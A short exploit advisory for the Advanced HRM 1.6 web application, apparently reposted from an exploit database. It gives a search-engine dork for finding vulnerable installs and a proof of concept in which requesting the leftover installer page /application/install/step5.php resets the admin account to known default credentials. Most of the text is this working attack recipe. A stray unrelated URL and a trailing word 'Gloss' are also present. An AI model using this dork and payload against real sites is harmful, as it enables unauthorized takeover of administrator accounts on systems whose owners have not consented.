Advanced HRM 1.6 Insecure Direct Object Reference – Torchsec
https://www.ispeech.org/text.to.speech
| # Title : Advanced HRM v1.6 Reset admin login Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit) |
| # Vendor : https://codecanyon.net/item/advanced-hrm/17767006 |
| # Dork : "Copyright © CoderPixel 2016 All Rights Reserved" |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine .
[+] The Vulnerability revolves around resetting script settings and reformulating a new password for the admin .
[+] use payload : /application/install/step5.php
[+] http://127.0.0.1/appchain.commy/hrm/application/install/step5.php
[+] Congratulations!
You have just install Advance HRM!
To Login Admin Portal:
Use this link - http://127.0.0.1/appchain.commy/hrm/
Username: admin
Password: admin.password
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
=======================================================================================================================================
Gloss